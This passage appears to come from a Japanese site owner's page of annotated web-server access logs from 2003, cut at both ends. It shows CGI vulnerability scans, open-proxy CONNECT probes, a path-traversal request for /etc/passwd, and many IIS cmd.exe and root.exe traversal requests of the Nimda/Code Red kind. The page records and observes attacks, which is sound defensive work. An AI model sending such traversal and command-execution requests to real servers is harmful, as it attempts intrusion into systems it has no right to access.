/cgi-bin/phf HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:05:47 +0900] "HEAD /Cgi-Bin/phf HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:05:47 +0900] "HEAD /cgi-bin/phf.cgi HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:05:50 +0900] "HEAD /cgi-bin/pfdisplay HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:05:53 +0900] "HEAD /cgi-bin/pfdisplay HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:05:53 +0900] "HEAD /cgi-bin/perlshop.cgi HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:05:58 +0900] "HEAD /cgi-bin/perl HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:06:01 +0900] "HEAD /cgi-bin/password.txt HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:06:02 +0900] "HEAD /cgi-bin/password.log HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:06:02 +0900] "HEAD /cgi-bin/password.dat HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:06:02 +0900] "HEAD /cgi-bin/password HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:06:02 +0900] "HEAD /cgi-bin/password HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:06:04 +0900] "HEAD /cgi-bin/passwd HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:06:14 +0900] "HEAD /cgi-bin/passwd HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:06:15 +0900] "HEAD /Cgi-Bin/nph-test-cgi HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:06:16 +0900] "HEAD /cgi-bin/nph-test-cgi HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:06:21 +0900] "HEAD /cgi-bin/nph-error.pl HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:06:34 +0900] "HEAD /cgi-bin/nlog-smb.pl HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:06:34 +0900] "HEAD /cgi-bin/nlog-smb.pl HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:06:42 +0900] "HEAD /cgi-bin/mylog.phtml HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:06:50 +0900] "HEAD /cgi-bin/mlog.phtml HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:06:51 +0900] "HEAD /cgi-bin/mlog.phtml HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:06:56 +0900] "HEAD /cgi-bin/man.sh HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:07:13 +0900] "HEAD /cgi-bin/maillist.pl HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:07:31 +0900] "HEAD /cgi-bin/mail HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:07:36 +0900] "HEAD /cgi-bin/MachineInfo HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:07:39 +0900] "HEAD /cgi-bin/MachineInfo HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:07:42 +0900] "HEAD /cgi-bin/LWGate.cgi HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:07:45 +0900] "HEAD /cgi-bin/lwgate HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:07:48 +0900] "HEAD /cgi-bin/lwgate HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:07:58 +0900] "HEAD /Cgi-Bin/loadpage.cgi HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:07:59 +0900] "HEAD /Cgi-Bin/loadpage.cgi HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:08:16 +0900] "HEAD /Cgi-Bin/ksh HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:08:35 +0900] "HEAD /cgi-bin/k HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:08:37 +0900] "HEAD /cgi-bin/k HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:08:40 +0900] "HEAD /cgi-bin/jj HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:08:48 +0900] "HEAD /Cgi-Bin/jj HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:08:49 +0900] "HEAD /cgi-bin/info2www HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:08:50 +0900] "HEAD /Cgi-Bin/htsearch HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:08:50 +0900] "HEAD /cgi-bin/htmlscript?../../../../etc/passwd HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:08:50 +0900] "HEAD /cgi-bin/htmlscript HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:08:52 +0900] "HEAD /cgi-bin/handler HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:08:53 +0900] "HEAD /cgi-bin/htsearch HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:08:53 +0900] "HEAD /cgi-bin/guestbook.pl HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:09:00 +0900] "HEAD /cgi-bin/htmlscript HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:09:02 +0900] "HEAD /cgi-bin/guestbook.cgi HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:09:03 +0900] "HEAD /cgi-bin/guestbook HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:09:07 +0900] "HEAD /cgi-bin/guestbook HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:09:08 +0900] "HEAD /cgi-bin/glimpse HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:09:08 +0900] "HEAD /cgi-bin/gH.cgi HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:09:10 +0900] "HEAD /cgi-bin/fortune HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:09:10 +0900] "HEAD /cgi-bin/fortune HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:09:11 +0900] "HEAD /cgi-bin/formmail.pl HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:09:11 +0900] "HEAD /Cgi-Bin/formmail.pl HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:09:13 +0900] "HEAD /Cgi-Bin/formmail HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:09:14 +0900] "HEAD /cgi-bin/FormHandler.cgi HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:09:16 +0900] "HEAD /cgi-bin/flexform.cgi HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:09:17 +0900] "HEAD /cgi-bin/flexform HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:09:17 +0900] "HEAD /cgi-bin/finger.pl HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:09:17 +0900] "HEAD /Cgi-Bin/FormHandler.cgi HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:09:19 +0900] "HEAD /cgi-bin/finger.pl HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:09:25 +0900] "HEAD /cgi-bin/finger.cgi HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:09:30 +0900] "HEAD /cgi-bin/files.pl HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:09:31 +0900] "HEAD /cgi-bin/filemail.pl HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:09:32 +0900] "HEAD /cgi-bin/filemail HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:09:34 +0900] "HEAD /cgi-bin/faxsurvey HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:09:35 +0900] "HEAD /Cgi-Bin/ezshopper/loadpage.cgi HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:09:35 +0900] "HEAD /cgi-bin/excite HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:09:36 +0900] "HEAD /cgi-bin/environ.cgi HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:09:36 +0900] "HEAD /Cgi-Bin/faxsurvey HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:09:43 +0900] "HEAD /Cgi-Bin/enivron.pl HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:09:44 +0900] "HEAD /Cgi-Bin/ezshopper/search.cgi HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:10:12 +0900] "HEAD /Cgi-Bin/enivron.pl HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:10:19 +0900] "HEAD /Cgi-Bin/echo.bat HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:10:48 +0900] "HEAD /cgi-bin/dumpenv.pl HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:10:49 +0900] "HEAD /cgi-bin/download.cgi HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:10:49 +0900] "HEAD /cgi-bin/dnewsweb HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:10:50 +0900] "HEAD /cgi-bin/dig.cgi HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:10:51 +0900] "HEAD /cgi-bin/dig.cgi HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:11:04 +0900] "HEAD /cgi-bin/day5notifier HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:11:06 +0900] "HEAD /cgi-bin/day5datanotifier.cgi HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:11:08 +0900] "HEAD /cgi-bin/date HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:11:10 +0900] "HEAD /cgi-bin/csh HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:11:10 +0900] "HEAD /cgi-bin/day5datacopier.cgi HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:11:14 +0900] "HEAD /Cgi-Bin/csh HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:11:17 +0900] "HEAD /cgi-bin/counterfiglet HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:11:18 +0900] "HEAD /cgi-bin/counterfiglet HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:11:21 +0900] "HEAD /cgi-bin/Count.cgi HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:11:24 +0900] "HEAD /Cgi-Bin/cmd32.exe HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:11:25 +0900] "HEAD /Cgi-Bin/cmd32.exe?/c+dir HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:11:28 +0900] "HEAD /Cgi-Bin/cmd.exe HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:11:29 +0900] "HEAD /cgi-bin/classifieds.cgi HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:11:30 +0900] "HEAD /cgi-bin/cmd.exe HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:11:30 +0900] "HEAD /cgi-bin/classifieds HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:11:31 +0900] "HEAD /cgi-bin/clickresponder.pl HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:11:31 +0900] "HEAD /cgi-bin/classified.cgi HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:11:34 +0900] "HEAD /cgi-bin/classified.cgi HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:11:39 +0900] "HEAD /cgi-bin/Cgitest.exe HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:11:55 +0900] "HEAD /Cgi-Bin/cgitest.exe HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:11:57 +0900] "HEAD /cgi-bin/Cgitest.exe HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:11:58 +0900] "HEAD /cgi-bin/ceilidh.exe/ceilidh/?N4 HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:12:02 +0900] "HEAD /cgi-bin/carbo.dll HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:12:02 +0900] "HEAD /cgi-bin/cart.pl HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:12:10 +0900] "HEAD /cgi-bin/carbo.dll HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:12:12 +0900] "HEAD /cgi-bin/campas HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:12:20 +0900] "HEAD /cgi-bin/calender_admin.pl HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:12:21 +0900] "HEAD /cgi-bin/calender.pl HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:12:22 +0900] "HEAD /cgi-bin/calendar HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:12:23 +0900] "HEAD /cgi-bin/calendar HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:12:33 +0900] "HEAD /cgi-bin/cachemgr.cgi HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:12:40 +0900] "HEAD /cgi-bin/bnbform HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:12:46 +0900] "HEAD /cgi-bin/bnbform HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:12:47 +0900] "HEAD /cgi-bin/bizdb1-search.cgi HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:12:50 +0900] "HEAD /cgi-bin/bigconf.cgi HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:12:55 +0900] "HEAD /cgi-bin/bigconf.cgi HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:12:57 +0900] "HEAD /cgi-bin/bash HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:12:59 +0900] "HEAD /cgi-bin/ax-admin.cgi HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:13:02 +0900] "HEAD /cgi-bin/axs.cgi HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:13:03 +0900] "HEAD /cgi-bin/ax.cgi HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:13:12 +0900] "HEAD /cgi-bin/authorize/dbmfiles/users HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:13:13 +0900] "HEAD /cgi-bin/AT-generate.cgi HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:13:15 +0900] "HEAD /cgi-bin/AT-generate.cgi HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:13:29 +0900] "HEAD /cgi-bin/ash HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:13:41 +0900] "HEAD /cgi-bin/architext_query.pl HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:13:42 +0900] "HEAD /cgi-bin/archie HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:13:42 +0900] "HEAD /cgi-bin/archie HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:13:43 +0900] "HEAD /cgi-bin/AnyForm2 HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:13:55 +0900] "HEAD /cgi-bin/anyboard.cgi HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:13:55 +0900] "HEAD /cgi-bin/anyboard.cgi HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:13:55 +0900] "HEAD /cgi-bin/AnyBoard.cgi HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:13:56 +0900] "HEAD /cgi-bin/AnyForm HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:13:58 +0900] "HEAD /cgi-bin/allmanageup.pl HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:14:04 +0900] "HEAD /cgi-bin/allmanage/settings.cfg HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:14:15 +0900] "HEAD /cgi-bin/allmanage/settings.cfg HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:14:26 +0900] "HEAD /cgi-bin/allmanage/adp HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:14:27 +0900] "HEAD /cgi-bin/allmanage.pl HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:14:28 +0900] "HEAD /cgi-bin/alibaba.pl\\dir HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:14:31 +0900] "HEAD /cgi-bin/alibaba.pl HTTP/1.1" 404 0 211.91.254.xxx - - [10/Apr/2003:21:14:37 +0900] "HEAD /Cgi-Bin/alibaba.pl HTTP/1.1" 404 0はじめて見たパターンです。オリジナルのハッキングエンジンなんでしょうか?
217.21.114.xxx - - [26/Feb/2003:16:15:11 +0900] "\x04\x01" 501 - 217.21.114.xxx - - [26/Feb/2003:16:15:33 +0900] "\x05\x01" 501 - 217.21.114.xxx - - [26/Feb/2003:16:15:35 +0900] "CONNECT 207.46.181.13:25 HTTP/1.1" 405 320 217.21.114.xxx - - [27/Feb/2003:15:36:44 +0900] "\x04\x01" 501 - 217.21.114.xxx - - [27/Feb/2003:15:37:05 +0900] "\x05\x01" 501 - 217.21.114.xxx - - [27/Feb/2003:15:37:07 +0900] "CONNECT 207.46.181.13:25 HTTP/1.1" 405 320 218.65.238.xxx - - [01/Mar/2003:03:08:47 +0900] "CONNECT 61.140.60.66:80 HTTP/1.1" 405 320 218.65.238.xxx - - [01/Mar/2003:03:12:57 +0900] "-" 408 - 218.65.238.xxx - - [01/Mar/2003:03:13:22 +0900] "-" 408 -これは新手の攻撃ですね。これも何がしかのセキュリティホールを狙ったものなんでしょうねぇ。
80.117.206.xxx - - [21/Feb/2003:01:37:50 +0900] "CONNECT 207.46.133.140:21 HTTP/1.0" 405 308 67.128.50.xxx - - [24/Feb/2003:05:33:17 +0900] "CONNECT maila.microsoft.com:25 HTTP/1.0" 405 308 64.231.68.xxx - - [28/Feb/2003:07:08:33 +0900] "CONNECT maila.microsoft.com:25 / HTTP/1.0" 400 376相変わらずトンネリングを探してるっぽいアタック来てます。
65.116.209.xxx - - [23/Feb/2003:01:52:55 +0900] "GET http://www.yahoo.com/ HTTP/1.1" 200 6471 65.116.209.xxx - - [26/Feb/2003:13:48:20 +0900] "GET http://www.yahoo.com/ HTTP/1.1" 200 6471 219.164.173.xxx - - [28/Feb/2003:11:01:51 +0900] "GET /(0024)http://www.google.ne.jp/ HTTP/1.0" 403 305プロキシサーチっぽいのも相変わらずですね。
61.106.193.xxx - - [23/Feb/2003:00:37:04 +0900] "-" 408 -謎のヘッダ加工アタックも相変わらずですし。
213.197.10.xxx [10/Feb/2003:23:07:43 +0900] "-" 408 - 61.103.249.xxx [12/Feb/2003:03:00:44 +0900] "-" 408 -これは全く意味不明のリクエストですね。リクエストヘッダ自体が加工してあるという ことでしょうか?
218.58.209.xxx [21/Jan/2003:21:00:00 +0900] "GET http://www.sina.com.cn/ HTTP/1.1" 200 6134 211.158.36.xxx [22/Jan/2003:08:37:55 +0900] "GET http://www.168ads.com/ HTTP/1.1" 200 6134 61.146.245.xxx [22/Jan/2003:18:32:30 +0900] "GET http://www.intel.com/ HTTP/1.1" 200 6134 4.33.13.xxx [03/Feb/2003:00:21:58 +0900] "GET http://www.linkshare.com/error_click_english.html HTTP/1.0" 404 295この辺は、httpプロキシとしてアクセスしてきている物のようですね。
217.230.123.xxx [20/Jan/2003:00:26:23 +0900] "CONNECT 207.46.133.140:21 HTTP/1.0" 405 308 217.230.123.xxx [20/Jan/2003:00:38:56 +0900] "CONNECT 207.46.133.140:21 HTTP/1.0" 405 308 217.234.26.xxx [20/Jan/2003:19:56:24 +0900] "CONNECT irc.huie.hokudai.ac.jp:6667 HTTP/1.0" 405 308 217.234.26.xxx [20/Jan/2003:19:56:24 +0900] "CONNECT irc.huie.hokudai.ac.jp:6667 HTTP/1.0" 405 308 217.234.26.xxx [20/Jan/2003:19:56:24 +0900] "CONNECT irc.huie.hokudai.ac.jp:6667 HTTP/1.0" 405 308 217.234.26.xxx [20/Jan/2003:19:56:24 +0900] "CONNECT irc.huie.hokudai.ac.jp:6667 HTTP/1.0" 405 308 63.187.136.xxx [23/Jan/2003:23:53:59 +0900] "CONNECT mail.calcentralmortgage.com:25 HTTP/1.0" 405 308 194.249.34.xxx [24/Jan/2003:05:10:47 +0900] "CONNECT irc.tokyo.wide.ad.jp:6667: HTTP/1.0" 400 337 194.249.34.xxx [24/Jan/2003:05:10:55 +0900] "CONNECT irc.tokyo.wide.ad.jp:6667: HTTP/1.0" 400 337 200.189.182.xxx [28/Jan/2003:05:51:49 +0900] "CONNECT mail.thumbgalleryhost.com:25 HTTP/1.0" 405 308 151.27.192.xxx [28/Jan/2003:22:38:18 +0900] "CONNECT 207.46.133.140:21 HTTP/1.0" 405 308 200.189.182.xxx [28/Jan/2003:05:51:49 +0900] "CONNECT mail.thumbgalleryhost.com:25 HTTP/1.0" 405 308 151.27.192.xxx [28/Jan/2003:22:38:18 +0900] "CONNECT 207.46.133.140:21 HTTP/1.0" 405 308 64.41.36.xxx [30/Jan/2003:23:03:32 +0900] "CONNECT 216.131.86.161:21 HTTP/1.0" 405 308 66.238.216.xxx [02/Feb/2003:12:45:29 +0900] "CONNECT mx1.hotmail.com:25 HTTP/1.1" 400 384 151.27.192.xxx [04/Feb/2003:03:16:44 +0900] "CONNECT 207.46.133.140:21 HTTP/1.0" 405 308 69.10.14.xxx [07/Feb/2003:13:41:45 +0900] "CONNECT maila.microsoft.com:25 / HTTP/1.0" 400 376 80.135.179.xxx [09/Feb/2003:21:19:27 +0900] "CONNECT 217.0.112.46:6667 HTTP/1.0" 405 308 217.226.1.xxx [09/Feb/2003:22:57:07 +0900] "CONNECT irc.tokyo.wide.ad.jp:6667: HTTP/1.0" 400 337 212.171.48.xxx [10/Feb/2003:10:49:49 +0900] "CONNECT 207.46.133.140:21 HTTP/1.0" 405 308 80.117.210.xxx [11/Feb/2003:21:40:52 +0900] "CONNECT 207.46.133.140:21 HTTP/1.0" 405 308以前から時々あったんですが、最近 CONNECT を使った妖しいアクセス多いです。
19:50:00 61.115.???.?? - HEAD /index.html 200 10 20:01:29 61.115.???.?? - HEAD /index.html 200 10 20:03:29 61.115.???.?? - HEAD /index.html 200 0 21:08:17 61.115.???.?? - HEAD /index.html 200 0直接的に攻撃かどうか不明なんでIPは伏せますけど、なにやら 妖しいアクセスですなぁ。
13:23:58 61.33.20.230 - GET /scripts/root.exe 404 490 13:23:58 61.33.20.230 - GET /MSADC/root.exe 404 90 13:23:58 61.33.20.230 - GET /c/winnt/system32/cmd.exe 404 10 13:23:59 61.33.20.230 - GET /d/winnt/system32/cmd.exe 404 0 13:23:59 61.33.20.230 - GET /scripts/..%5c../winnt/system32/cmd.exe 500 0 13:23:59 61.33.20.230 - GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe 404 0 13:24:00 61.33.20.230 - GET /scripts/root.exe 404 10 13:24:00 61.33.20.230 - GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe 404 10 13:24:00 61.33.20.230 - GET /MSADC/root.exe 404 0 13:24:00 61.33.20.230 - GET /msadc/..%5c../..%5c../..%5c/..チ../..チ../..チ../winnt/system32/cmd.exe 500 0 13:24:00 61.33.20.230 - GET /c/winnt/system32/cmd.exe 404 0 13:24:02 61.33.20.230 - GET /scripts/..チ../winnt/system32/cmd.exe 500 70 13:24:02 61.33.20.230 - GET /scripts/winnt/system32/cmd.exe 404 10 13:24:02 61.33.20.230 - GET /d/winnt/system32/cmd.exe 404 10 13:24:05 61.33.20.230 - GET /winnt/system32/cmd.exe 404 0 13:24:05 61.33.20.230 - GET /scripts/..%5c../winnt/system32/cmd.exe 500 0 13:24:05 61.33.20.230 - GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe 404 10 13:24:05 61.33.20.230 - GET /winnt/system32/cmd.exe 404 0 13:24:05 61.33.20.230 - GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe 404 0 13:24:06 61.33.20.230 - GET /scripts/..%5c../winnt/system32/cmd.exe 500 0 13:24:06 61.33.20.230 - GET /scripts/..%5c../winnt/system32/cmd.exe 500 0 13:24:06 61.33.20.230 - GET /msadc/..%5c../..%5c../..%5c/..チ../..チ../..チ../winnt/system32/cmd.exe 500 10 13:24:06 61.33.20.230 - GET /scripts/..%5c../winnt/system32/cmd.exe 500 0 13:24:06 61.33.20.230 - GET /scripts/..チ../winnt/system32/cmd.exe 500 11 13:24:06 61.33.20.230 - GET /scripts/..%2f../winnt/system32/cmd.exe 500 0 13:24:10 61.33.20.230 - GET /scripts/winnt/system32/cmd.exe 404 10 13:24:10 61.33.20.230 - GET /winnt/system32/cmd.exe 404 0 13:24:11 61.33.20.230 - GET /winnt/system32/cmd.exe 404 0 13:24:11 61.33.20.230 - GET /scripts/..%5c../winnt/system32/cmd.exe 500 0 13:24:11 61.33.20.230 - GET /scripts/..%5c../winnt/system32/cmd.exe 500 10 13:24:15 61.33.20.230 - GET /scripts/..%5c../winnt/system32/cmd.exe 500 10 13:24:15 61.33.20.230 - GET /scripts/..%2f../winnt/system32/cmd.exe 500 0 13:30:56 61.115.206.14 - GET /default.ida 404 70 13:31:52 61.32.250.42 - GET /scripts/root.exe 404 10 13:31:52 61.32.250.42 - GET /MSADC/root.exe 404 10 13:32:02 61.32.250.42 - GET /c/winnt/system32/cmd.exe 404 0 13:32:06 61.32.250.42 - GET /d/winnt/system32/cmd.exe 404 10 13:32:06 61.32.250.42 - GET /scripts/..%5c../winnt/system32/cmd.exe 500 0 13:32:06 61.32.250.42 - GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe 404 0 13:32:10 61.32.250.42 - GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe 404 0 13:32:14 61.32.250.42 - GET /msadc/..%5c../..%5c../..%5c/..チ../..チ../..チ../winnt/system32/cmd.exe 500 0 13:32:14 61.32.250.42 - GET /scripts/..チ../winnt/system32/cmd.exe 500 0 13:32:35 61.32.250.42 - GET /scripts/winnt/system32/cmd.exe 404 10 13:32:39 61.32.250.42 - GET /winnt/system32/cmd.exe 404 10 13:33:00 61.32.250.42 - GET /winnt/system32/cmd.exe 404 10 13:33:04 61.32.250.42 - GET /scripts/..%5c../winnt/system32/cmd.exe 500 11 13:33:19 61.32.250.42 - GET /scripts/..%5c../winnt/system32/cmd.exe 500 0 13:35:41 61.174.104.218 - GET /scripts/root.exe 404 10 13:35:42 61.174.104.218 - GET /MSADC/root.exe 404 0 13:35:44 61.174.104.218 - GET /c/winnt/system32/cmd.exe 404 0 13:35:45 61.174.104.218 - GET /d/winnt/system32/cmd.exe 404 10 13:35:49 61.174.104.218 - GET /scripts/..%5c../winnt/system32/cmd.exe 500 0 13:35:49 61.174.104.218 - GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe 404 0 13:35:51 61.174.104.218 - GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe 404 10 13:35:52 61.174.104.218 - GET /msadc/..%5c../..%5c../..%5c/..チ../..チ../..チ../winnt/system32/cmd.exe 500 0 13:35:52 61.174.104.218 - GET /scripts/..チ../winnt/system32/cmd.exe 500 10 13:35:54 61.174.104.218 - GET /scripts/winnt/system32/cmd.exe 404 10 13:35:55 61.174.104.218 - GET /winnt/system32/cmd.exe 404 0 13:35:56 61.174.104.218 - GET /winnt/system32/cmd.exe 404 0 13:35:57 61.174.104.218 - GET /scripts/..%5c../winnt/system32/cmd.exe 500 0 13:35:57 61.174.104.218 - GET /scripts/..%5c../winnt/system32/cmd.exe 500 0 13:35:58 61.174.104.218 - GET /scripts/..%5c../winnt/system32/cmd.exe 500 0 13:35:58 61.174.104.218 - GET /scripts/..%2f../winnt/system32/cmd.exe 500 10 13:38:03 61.220.130.69 - GET /scripts/root.exe 404 10 13:38:05 61.220.130.69 - GET /MSADC/root.exe 404 10 13:38:07 61.220.130.69 - GET /c/winnt/system32/cmd.exe 404 10 13:38:09 61.220.130.69 - GET /d/winnt/system32/cmd.exe 404 0 13:38:12 61.220.130.69 - GET /scripts/..%5c../winnt/system32/cmd.exe 500 0 13:38:14 61.220.130.69 - GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe 404 0 13:38:18 61.220.130.69 - GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe 404 0 13:38:21 61.220.130.69 - GET /msadc/..%5c../..%5c../..%5c/..チ../..チ../..チ../winnt/system32/cmd.exe 500 0 13:38:23 61.220.130.69 - GET /scripts/..チ../winnt/system32/cmd.exe 500 0 13:39:14 61.73.97.212 - GET 